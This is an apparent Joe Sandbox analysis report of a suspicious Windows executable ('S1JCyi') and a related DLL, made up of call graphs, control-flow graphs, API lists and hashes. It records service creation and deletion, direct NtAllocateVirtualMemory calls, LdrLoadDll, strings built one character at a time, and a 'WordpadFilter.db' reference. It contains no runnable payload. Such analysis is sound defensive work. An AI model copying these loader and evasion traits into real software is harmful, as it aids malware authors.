13967 140005c17 13962->13967 13964 140005bfe 13963->13964 13965 140009540 _lock 12 API calls 13963->13965 13966 140009300 _lock 10 API calls 13964->13966 13965->13964 13968 140005c08 13966->13968 13969 140005c3d 13967->13969 13971 140005c29 13967->13971 13972 140009540 _lock 12 API calls 13967->13972 13970 140008510 _lock 3 API calls 13968->13970 14024 140009f50 GetStartupInfoA 13969->14024 13970->13962 13973 140009300 _lock 10 API calls 13971->13973 13972->13971 13975 140005c33 13973->13975 13977 140008510 _lock 3 API calls 13975->13977 13977->13969 13978 140005c56 14044 140009e30 13978->14044 13981 140005c5b 14062 140009c30 13981->14062 13985 140005c73 13986 140005c81 13985->13986 13988 1400084e0 _lock 12 API calls 13985->13988 14092 140009690 13986->14092 13988->13986 13989 140005c86 13990 140005c94 13989->13990 13991 1400084e0 _lock 12 API calls 13989->13991 14104 140008650 13990->14104 13991->13990 13993 140005c9e 13994 1400084e0 _lock 12 API calls 13993->13994 13995 140005ca9 13993->13995 13994->13995 14108 140001520 13995->14108 13997 140005ad3 13997->13954 13999 14000954e _lock 13998->13999 14000 14000959c 13999->14000 14001 14000961c 13999->14001 14003 1400095c9 GetStdHandle 13999->14003 14002 140009300 _lock 10 API calls 14000->14002 14001->13951 14002->14001 14003->14000 14004 1400095dc 14003->14004 14004->14000 14005 1400095e2 WriteFile 14004->14005 14005->14000 14009 140009320 _lock 14006->14009 14007 140009330 14007->13957 14008 1400094dc GetStdHandle 14008->14007 14010 1400094ef 14008->14010 14009->14007 14009->14008 14012 140009375 _lock 14009->14012 14010->14007 14011 1400094f5 WriteFile 14010->14011 14011->14007 14012->14007 14013 1400093b9 GetModuleFileNameA 14012->14013 14014 1400093d9 _lock 14013->14014 14126 14000f000 14014->14126 14018 140008543 ExitProcess 14017->14018 14019 14000852a GetProcAddress 14017->14019 14019->14018 14020 14000853f 14019->14020 14020->14018 14022 14000a334 14021->14022 14023 14000a339 HeapSetInformation 14021->14023 14022->13961 14023->13961 14152 140008370 14024->14152 14026 140005c48 14026->13978 14037 1400084e0 14026->14037 14027 14000a1c4 GetStdHandle 14034 14000a17c 14027->14034 14028 140008370 3 API calls 14031 140009f8a 14028->14031 14029 14000a239 SetHandleCount 14029->14026 14030 14000a1d8 GetFileType 14030->14034 14031->14026 14031->14028 14032 14000a0e3 14031->14032 14031->14034 14032->14026 14033 14000a11c GetFileType 14032->14033 14032->14034 14157 14000edc0 14032->14157 14033->14032 14034->14026 14034->14027 14034->14029 14034->14030 14036 14000edc0 _lock 3 API calls 14034->14036 14036->14034 14038 140009540 _lock 12 API calls 14037->14038 14039 1400084ed 14038->14039 14040 140009300 _lock 10 API calls 14039->14040 14041 1400084f4 14040->14041 14042 1400073e0 _lock LdrLoadDll 14041->14042 14043 140008500 14042->14043 14045 140009e7c 14044->14045 14046 140009e3e GetCommandLineW 14044->14046 14049 140009e81 GetCommandLineW 14045->14049 14051 140009e69 14045->14051 14047 140009e49 GetCommandLineW 14046->14047 14048 140009e5e GetLastError 14046->14048 14047->14048 14050 140009e75 14048->14050 14048->14051 14049->14051 14050->13981 14051->14050 14052 140009e91 GetCommandLineA MultiByteToWideChar 14051->14052 14053 140009ec8 14052->14053 14054 140009ed9 14052->14054 14053->13981 14055 140008370 3 API calls 14054->14055 14056 140009eeb 14055->14056 14057 140009f32 14056->14057 14058 140009ef3 MultiByteToWideChar 14056->14058 14057->13981 14059 140009f13 14058->14059 14060 140009f2a 14058->14060 14059->13981 14171 140008de0 14060->14171 14063 140009c52 GetEnvironmentStringsW 14062->14063 14067 140009c86 14062->14067 14064 140009c6c GetLastError 14063->14064 14072 140009c60 14063->14072 14066 140009c77 14064->14066 14064->14067 14065 140009c91 GetEnvironmentStringsW 14069 140005c67 14065->14069 14065->14072 14068 140009d09 GetEnvironmentStrings 14066->14068 14066->14069 14067->14065 14067->14066 14068->14069 14070 140009d17 14068->14070 14088 1400099c0 GetModuleFileNameW 14069->14088 14071 140009d58 14070->14071 14075 140009d20 MultiByteToWideChar 14070->14075 14076 140008370 3 API calls 14071->14076 14176 140008300 14072->14176 14075->14069 14075->14070 14079 140009d68 14076->14079 14077 140009ce1 __CxxFrameHandler 14083 140009cef FreeEnvironmentStringsW 14077->14083 14078 140009cd1 FreeEnvironmentStringsW 14078->14069 14080 140009d7d 14079->14080 14081 140009d70 FreeEnvironmentStringsA 14079->14081 14082 140009de5 FreeEnvironmentStringsA 14080->14082 14084 140009d90 MultiByteToWideChar 14080->14084 14081->14069 14082->14069 14083->14069 14084->14080 14085 140009e0e 14084->14085 14086 140008de0 _lock 2 API calls 14085->14086 14087 140009e16 FreeEnvironmentStringsA 14086->14087 14087->14069 14089 140009a03 14088->14089 14090 140008300 _lock 17 API calls 14089->14090 14091 140009bca 14089->14091 14090->14091 14091->13985 14093 1400096b2 14092->14093 14094 1400096a8 14092->14094 14095 140008370 3 API calls 14093->14095 14094->13989 14096 1400096fa 14095->14096 14097 140009709 14096->14097 14098 1400097a5 14096->14098 14100 140008370 3 API calls 14096->14100 14101 1400097e5 14096->14101 14097->13989 14099 140008de0 _lock 2 API calls 14098->14099 14103 1400097b4 14099->14103 14100->14096 14102 140008de0 _lock 2 API calls 14101->14102 14102->14103 14103->13989 14106 140008666 14104->14106 14107 1400086bf 14106->14107 14192 140005380 14106->14192 14107->13993 14109 140001565 14108->14109 14110 140001569 14109->14110 14111 14000157e 14109->14111 14230 140001430 GetModuleFileNameW OpenSCManagerW 14110->14230 14114 140001595 OpenSCManagerW 14111->14114 14115 14000164f 14111->14115 14118 1400015b2 GetLastError 14114->14118 14119 1400015cf OpenServiceW 14114->14119 14116 140001654 14115->14116 14117 140001669 StartServiceCtrlDispatcherW 14115->14117 14239 1400011f0 14116->14239 14117->13997 14118->13997 14121 140001611 DeleteService 14119->14121 14122 1400015e9 GetLastError CloseServiceHandle 14119->14122 14123 140001626 CloseServiceHandle CloseServiceHandle 14121->14123 14124 14000161e GetLastError 14121->14124 14122->13997 14123->13997 14124->14123 14127 14000f01e __CxxFrameHandler 14126->14127 14128 14000f03b LoadLibraryA 14127->14128 14129 14000f125 _lock 14127->14129 14130 14000f054 GetProcAddress 14128->14130 14131 1400094c9 14128->14131 14144 14000f165 14129->14144 14149 1400073e0 LdrLoadDll 14129->14149 14130->14131 14132 14000f06d _lock 14130->14132 14131->13957 14136 14000f075 GetProcAddress 14132->14136 14134 1400073e0 _lock LdrLoadDll 14134->14131 14135 1400073e0 _lock LdrLoadDll 14141 14000f1e9 14135->14141 14138 140007220 _lock 14136->14138 14140 14000f094 GetProcAddress 14138->14140 14139 1400073e0 _lock LdrLoadDll 14139->14144 14143 14000f0b3 _lock 14140->14143 14142 1400073e0 _lock LdrLoadDll 14141->14142 14145 14000f1a3 _lock 14141->14145 14142->14145 14143->14129 14146 14000f0e9 GetProcAddress 14143->14146 14144->14135 14144->14145 14145->14134 14147 14000f101 _lock 14146->14147 14147->14129 14148 14000f10d GetProcAddress 14147->14148 14148->14129 14150 140007333 14149->14150 14150->14149 14151 140007403 14150->14151 14151->14139 14153 1400083a0 14152->14153 14155 1400083e0 14153->14155 14156 1400083be Sleep 14153->14156 14163 14000e850 14153->14163 14155->14031 14156->14153 14156->14155 14158 1400073e0 _lock LdrLoadDll 14157->14158 14159 14000edec _lock 14158->14159 14160 14000ee1d _lock 14159->14160 14161 14000ee26 GetModuleHandleA 14159->14161 14160->14032 14161->14160 14162 14000ee38 GetProcAddress 14161->14162 14162->14160 14164 14000e865 14163->14164 14165 14000e8be HeapAlloc 14164->14165 14167 14000e876 _lock 14164->14167 14168 1400090b0 14164->14168 14165->14164 14165->14167 14167->14153 14169 1400073e0 _lock LdrLoadDll 14168->14169 14170 1400090c5 14169->14170 14170->14164 14172 140008de9 HeapFree 14171->14172 14173 140008e19 _lock 14171->14173 14172->14173 14174 140008dff _lock 14172->14174 14173->14057 14175 140008e09 GetLastError 14174->14175 14175->14173 14177 140008320 14176->14177 14179 140008338 Sleep 14177->14179 14180 140008358 14177->14180 14181 1400090f0 14177->14181 14179->14177 14179->14180 14180->14077 14180->14078 14182 14000919e 14181->14182 14189 140009103 14181->14189 14183 1400090b0 _lock LdrLoadDll 14182->14183 14185 1400091a3 _lock 14183->14185 14184 14000914c HeapAlloc 14184->14189 14190 140009173 _lock 14184->14190 14185->14177 14186 140009540 _lock 12 API calls 14186->14189 14187 140009300 _lock 10 API calls 14187->14189 14188 1400090b0 _lock LdrLoadDll 14188->14189 14189->14184 14189->14186 14189->14187 14189->14188 14189->14190 14191 140008510 _lock 3 API calls 14189->14191 14190->14177 14191->14189 14195 140005250 14192->14195 14194 140005389 14194->14107 14196 140005271 14195->14196 14197 1400073e0 _lock LdrLoadDll 14196->14197 14198 14000527e 14197->14198 14199 1400073e0 _lock LdrLoadDll 14198->14199 14200 14000528d 14199->14200 14206 1400052f0 _lock 14200->14206 14207 140008490 14200->14207 14202 1400052b5 14203 1400052d9 14202->14203 14202->14206 14210 140008400 14202->14210 14205 140008400 7 API calls 14203->14205 14203->14206 14205->14206 14206->14194 14208 1400084c5 HeapSize 14207->14208 14209 140008499 _lock 14207->14209 14209->14202 14212 140008430 14210->14212 14213 140008472 14212->14213 14214 140008450 Sleep 14212->14214 14215 14000e920 14212->14215 14213->14203 14214->14212 14214->14213 14216 14000e935 14215->14216 14217 14000e94c 14216->14217 14227 14000e95e 14216->14227 14218 140008de0 _lock 2 API calls 14217->14218 14221 14000e951 14218->14221 14219 14000e9b1 14220 1400090b0 _lock LdrLoadDll 14219->14220 14223 14000e9b9 _lock 14220->14223 14221->14212 14222 14000e973 HeapReAlloc 14222->14223 14222->14227 14223->14212 14224 14000e9f4 _lock 14226 14000e9f9 GetLastError 14224->14226 14225 1400090b0 _lock LdrLoadDll 14225->14227 14226->14223 14227->14219 14227->14222 14227->14224 14227->14225 14228 14000e9db _lock 14227->14228 14229 14000e9e0 GetLastError 14228->14229 14229->14223 14231 140001482 CreateServiceW 14230->14231 14232 14000147a GetLastError 14230->14232 14234 1400014ea GetLastError 14231->14234 14235 1400014df CloseServiceHandle 14231->14235 14233 1400014fd 14232->14233 14245 140004f30 14233->14245 14237 1400014f2 CloseServiceHandle 14234->14237 14235->14237 14237->14233 14238 14000150d 14238->13997 14240 1400011fa 14239->14240 14254 1400051d0 14240->14254 14243 140004f30 sprintf_s NtAllocateVirtualMemory 14244 140001262 14243->14244 14244->13997 14247 140004f39 __CxxFrameHandler 14245->14247 14246 140004f44 14246->14238 14247->14246 14250 140006c95 14247->14250 14249 14000660e sprintf_s 14249->14238 14252 140006d7b 14250->14252 14253 140006d9d 14250->14253 14251 140006f95 NtAllocateVirtualMemory 14251->14253 14252->14251 14252->14253 14253->14249 14257 140008270 14254->14257 14256 140001238 MessageBoxW 14256->14243 14258 14000827e 14257->14258 14260 1400082ac _lock 14257->14260 14258->14260 14261 140008120 14258->14261 14260->14256 14262 14000816a 14261->14262 14266 14000813b _lock 14261->14266 14264 1400081d7 14262->14264 14262->14266 14267 140007f50 14262->14267 14265 140007f50 sprintf_s 54 API calls 14264->14265 14264->14266 14265->14266 14266->14260 14276 140007f69 sprintf_s 14267->14276 14268 140007f74 _lock 14268->14264 14269 14000801d 14270 1400080d5 14269->14270 14271 14000802f 14269->14271 14272 14000cc00 sprintf_s 54 API calls 14270->14272 14273 14000804c 14271->14273 14275 140008081 14271->14275 14277 140008056 14272->14277 14283 14000cc00 14273->14283 14275->14277 14291 14000c2a0 14275->14291 14276->14268 14276->14269 14280 14000cd50 14276->14280 14277->14264 14281 140008300 _lock 17 API calls 14280->14281 14282 14000cd6a 14281->14282 14282->14269 14284 14000cc3f 14283->14284 14290 14000cc23 _lock sprintf_s 14283->14290 14284->14290 14299 14000fc50 14284->14299 14288 14000ccc5 _lock sprintf_s 14344 14000fd20 LeaveCriticalSection 14288->14344 14290->14277 14292 14000c2e0 14291->14292 14295 14000c2c3 _lock sprintf_s 14291->14295 14293 14000fc50 sprintf_s 25 API calls 14292->14293 14292->14295 14294 14000c34e 14293->14294 14296 14000c1f0 sprintf_s 2 API calls 14294->14296 14297 14000c367 _lock sprintf_s 14294->14297 14295->14277 14296->14297 14378 14000fd20 LeaveCriticalSection 14297->14378 14300 14000fc96 14299->14300 14301 14000fccb 14299->14301 14345 14000b400 14300->14345 14302 14000ccac 14301->14302 14303 14000fccf EnterCriticalSection 14301->14303 14302->14288 14309 14000c3f0 14302->14309 14303->14302 14311 14000c42e 14309->14311 14328 14000c427 _lock sprintf_s 14309->14328 14310 140004f30 sprintf_s NtAllocateVirtualMemory 14312 14000cbe6 14310->14312 14315 14000c4fb __CxxFrameHandler sprintf_s 14311->14315 14311->14328 14372 14000c1f0 14311->14372 14312->14288 14314 14000c841 14316 14000c86a 14314->14316 14317 14000cb20 WriteFile 14314->14317 14315->14314 14318 14000c526 GetConsoleMode 14315->14318 14320 14000c936 14316->14320 14324 14000c876 14316->14324 14319 14000cb53 GetLastError 14317->14319 14317->14328 14318->14314 14321 14000c557 14318->14321 14319->14328 14326 14000c940 14320->14326 14334 14000ca02 14320->14334 14321->14314 14322 14000c564 GetConsoleCP 14321->14322 14322->14328 14338 14000c581 sprintf_s 14322->14338 14323 14000c8c5 WriteFile 14323->14324 14325 14000c928 GetLastError 14323->14325 14324->14323 14324->14328 14325->14328 14326->14328 14329 14000c991 WriteFile 14326->14329 14327 14000ca57 WideCharToMultiByte 14330 14000cb15 GetLastError 14327->14330 14327->14334 14328->14310 14329->14326 14331 14000c9f4 GetLastError 14329->14331 14330->14328 14331->14328 14332 14000cab0 WriteFile 14333 14000caf6 GetLastError 14332->14333 14332->14334 14333->14328 14333->14334 14334->14327 14334->14328 14334->14332 14335 14000c649 WideCharToMultiByte 14335->14328 14336 14000c68c WriteFile 14335->14336 14336->14338 14339 14000c80d GetLastError 14336->14339 14337 14000c829 GetLastError 14337->14328 14338->14328 14338->14335 14338->14337 14340 14000fd50 7 API calls sprintf_s 14338->14340 14341 14000c6e2 WriteFile 14338->14341 14343 14000c81b GetLastError 14338->14343 14339->14328 14340->14338 14341->14338 14342 14000c7ff GetLastError 14341->14342 14342->14328 14343->14328 14346 14000b41e 14345->14346 14347 14000b42f EnterCriticalSection 14345->14347 14351 14000b2f0 14346->14351 14349 14000b423 14349->14347 14350 1400084e0 _lock 12 API calls 14349->14350 14350->14347 14352 14000b317 14351->14352 14354 14000b32e 14351->14354 14353 140009540 _lock 12 API calls 14352->14353 14355 14000b31c 14353->14355 14356 140008300 _lock 17 API calls 14354->14356 14360 14000b342 _lock 14354->14360 14357 140009300 _lock 10 API calls 14355->14357 14358 14000b350 14356->14358 14359 14000b324 14357->14359 14358->14360 14361 14000b400 _lock 22 API calls 14358->14361 14362 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14359->14362 14360->14349 14363 14000b371 14361->14363 14362->14354 14364 14000b3a7 14363->14364 14365 14000b379 14363->14365 14367 140008de0 _lock HeapFree GetLastError 14364->14367 14366 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14365->14366 14368 14000b386 14366->14368 14371 14000b392 _lock 14367->14371 14370 140008de0 _lock HeapFree GetLastError 14368->14370 14368->14371 14369 14000b3b0 LeaveCriticalSection 14369->14360 14370->14371 14371->14369 14373 14000c20c sprintf_s 14372->14373 14374 14000c212 _lock 14373->14374 14375 14000c22c SetFilePointer 14373->14375 14374->14315 14376 14000c24a GetLastError 14375->14376 14377 14000c254 sprintf_s 14375->14377 14376->14377 14377->14315 13944 140006c95 13946 140006d7b 13944->13946 13947 140006d9d 13944->13947 13945 140006f95 NtAllocateVirtualMemory 13945->13947 13946->13945 13946->13947 14379 1400054e0 14380 14000552c 14379->14380 14383 140005506 _lock 14379->14383 14392 1400074d0 14380->14392 14384 140008370 3 API calls 14388 140005545 __CxxFrameHandler 14384->14388 14385 1400055b8 14386 140008de0 _lock 2 API calls 14385->14386 14387 1400055c0 sprintf_s 14386->14387 14387->14383 14388->14385 14396 1400074f0 14388->14396 14391 1400055b0 GetLastError 14391->14385 14394 140007333 14392->14394 14393 140005536 14393->14384 14394->14393 14395 1400073e0 LdrLoadDll 14394->14395 14395->14394 14398 140007333 14396->14398 14397 140005561 CreateThread 14397->14387 14397->14391 14398->14397 14399 1400073e0 LdrLoadDll 14398->14399 14399->14398

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 131 140006c95-140006d75 132 1400075a3-1400075af 131->132 133 140006d7b-140006d9b 131->133 134 140006da2-140006dbc 133->134 135 140006d9d 133->135 136 140006dc3-140006ded 134->136 137 140006dbe 134->137 135->132 138 140006df4-140006e04 136->138 139 140006def 136->139 137->132 140 140006e06 138->140 141 140006e0b-140006e19 138->141 139->132 140->132 142 140006e1b 141->142 143 140006e20-140006e2f 141->143 142->132 144 140006e31 143->144 145 140006e36-140006e4e 143->145 144->132 146 140006e5a-140006e67 145->146 147 140006e69-140006e94 146->147 148 140006e9d-140006ed0 146->148 149 140006e96 147->149 150 140006e9b 147->150 151 140006edc-140006ee9 148->151 149->132 150->146 152 140006f89-140006f8e 151->152 153 140006eef-140006f23 151->153 157 140006f95-140006fd6 NtAllocateVirtualMemory 152->157 158 140006f90 152->158 155 140006f25-140006f2d 153->155 156 140006f2f-140006f33 153->156 159 140006f37-140006f7a 155->159 156->159 157->132 160 140006fdc-140007020 157->160 158->132 161 140006f84 159->161 162 140006f7c-140006f80 159->162 163 14000702c-140007037 160->163 161->151 162->161 165 140007039-140007058 163->165 166 14000705a-140007062 163->166 165->163 168 14000706e-14000707b 166->168 169 140007081-140007094 168->169 170 140007148-14000715e 168->170 171 140007096-1400070a9 169->171 172 1400070ab 169->172 173 1400072e2-1400072eb 170->173 174 140007164-14000717a 170->174 171->172 175 1400070ad-1400070db 171->175 176 140007064-14000706a 172->176 174->173 177 1400070ea-140007101 175->177 176->168 178 140007143 177->178 179 140007103-140007141 177->179 178->176 179->177
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @$@
                                      • API String ID: 0-149943524
                                      • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                      • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                      • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                      • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 256 1400073e0-1400073e9 LdrLoadDll 257 1400073f8-140007401 256->257 258 140007403 257->258 259 140007408-14000742e 257->259 260 1400075a3-1400075af 258->260 262 140007435-140007462 259->262 263 140007430 259->263 265 140007464-14000747e 262->265 266 1400074b6-1400074e9 262->266 264 140007559-140007567 263->264 274 140007341-1400073de 264->274 275 14000756c-1400075a2 264->275 268 1400074b4 265->268 269 140007480-1400074b3 265->269 270 1400074eb-14000752b 266->270 271 14000752c-140007535 266->271 268->271 269->268 270->271 272 140007552 271->272 273 140007537-140007554 271->273 272->260 273->264 274->256 275->260
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                      • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                      • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                      • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: File$CreateReadmalloc
                                      • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                      • API String ID: 3950102678-3381721293
                                      • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                      • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                      • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                      • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 25 7ffe1a481c00-7ffe1a481c06 26 7ffe1a481c41-7ffe1a481c4b 25->26 27 7ffe1a481c08-7ffe1a481c0b 25->27 30 7ffe1a481d68-7ffe1a481d7d 26->30 28 7ffe1a481c35-7ffe1a481c74 call 7ffe1a482470 27->28 29 7ffe1a481c0d-7ffe1a481c10 27->29 48 7ffe1a481d42 28->48 49 7ffe1a481c7a-7ffe1a481c8f call 7ffe1a482304 28->49 31 7ffe1a481c12-7ffe1a481c15 29->31 32 7ffe1a481c28 __scrt_dllmain_crt_thread_attach 29->32 33 7ffe1a481d7f 30->33 34 7ffe1a481d8c-7ffe1a481da6 call 7ffe1a482304 30->34 36 7ffe1a481c21-7ffe1a481c26 call 7ffe1a4823b4 31->36 37 7ffe1a481c17-7ffe1a481c20 31->37 40 7ffe1a481c2d-7ffe1a481c34 32->40 38 7ffe1a481d81-7ffe1a481d8b 33->38 46 7ffe1a481ddb-7ffe1a481e0c call 7ffe1a482630 34->46 47 7ffe1a481da8-7ffe1a481dd9 call 7ffe1a48242c call 7ffe1a4822d4 call 7ffe1a4827b4 call 7ffe1a4825d0 call 7ffe1a4825f4 call 7ffe1a48245c 34->47 36->40 59 7ffe1a481e0e-7ffe1a481e14 46->59 60 7ffe1a481e1d-7ffe1a481e23 46->60 47->38 52 7ffe1a481d44-7ffe1a481d59 48->52 57 7ffe1a481c95-7ffe1a481ca6 call 7ffe1a482374 49->57 58 7ffe1a481d5a-7ffe1a481d67 call 7ffe1a482630 49->58 75 7ffe1a481ca8-7ffe1a481ccc call 7ffe1a482778 call 7ffe1a4822c4 call 7ffe1a4822e8 call 7ffe1a487b10 57->75 76 7ffe1a481cf7-7ffe1a481d01 call 7ffe1a4825d0 57->76 58->30 59->60 64 7ffe1a481e16-7ffe1a481e18 59->64 65 7ffe1a481e65-7ffe1a481e6d call 7ffe1a481720 60->65 66 7ffe1a481e25-7ffe1a481e2f 60->66 71 7ffe1a481f02-7ffe1a481f0f 64->71 77 7ffe1a481e72-7ffe1a481e7b 65->77 72 7ffe1a481e31-7ffe1a481e34 66->72 73 7ffe1a481e36-7ffe1a481e3c 66->73 78 7ffe1a481e3e-7ffe1a481e44 72->78 73->78 75->76 127 7ffe1a481cce-7ffe1a481cd5 __scrt_dllmain_after_initialize_c 75->127 76->48 99 7ffe1a481d03-7ffe1a481d0f call 7ffe1a482620 76->99 84 7ffe1a481eb3-7ffe1a481eb5 77->84 85 7ffe1a481e7d-7ffe1a481e7f 77->85 80 7ffe1a481e4a-7ffe1a481e5f call 7ffe1a481c00 78->80 81 7ffe1a481ef8-7ffe1a481f00 78->81 80->65 80->81 81->71 88 7ffe1a481ebc-7ffe1a481ed1 call 7ffe1a481c00 84->88 89 7ffe1a481eb7-7ffe1a481eba 84->89 85->84 94 7ffe1a481e81-7ffe1a481ea3 call 7ffe1a481720 call 7ffe1a481d68 85->94 88->81 108 7ffe1a481ed3-7ffe1a481edd 88->108 89->81 89->88 94->84 122 7ffe1a481ea5-7ffe1a481eaa 94->122 115 7ffe1a481d35-7ffe1a481d40 99->115 116 7ffe1a481d11-7ffe1a481d1b call 7ffe1a482538 99->116 113 7ffe1a481ee4-7ffe1a481ef2 108->113 114 7ffe1a481edf-7ffe1a481ee2 108->114 119 7ffe1a481ef4 113->119 114->119 115->52 116->115 126 7ffe1a481d1d-7ffe1a481d2b 116->126 119->81 122->84 126->115 127->76 128 7ffe1a481cd7-7ffe1a481cf4 call 7ffe1a487acc 127->128 128->76
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                      • String ID:
                                      • API String ID: 190073905-0
                                      • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                      • Instruction ID: 6c368714ba3346e64020350a128923375ac8200800ec15968ed373835dec1351
                                      • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                      • Instruction Fuzzy Hash: 2E818E21F09F4386F664ABABB4512792290AF45FA0F4440F7DA4E477B6DE3CE8F58610

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                      • String ID: WordpadFilter.db
                                      • API String ID: 868324331-3647581008
                                      • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                      • Instruction ID: d01fd0ac3f8ab7241465ab246bcf19a90fda8a8be40de61eea3dbd982737bb9a
                                      • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                      • Instruction Fuzzy Hash: 8D317C32B15F4189E750CFA2E8406BD73A5EB88B98F1446B6EE8D13B55EF38D5A1C340

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
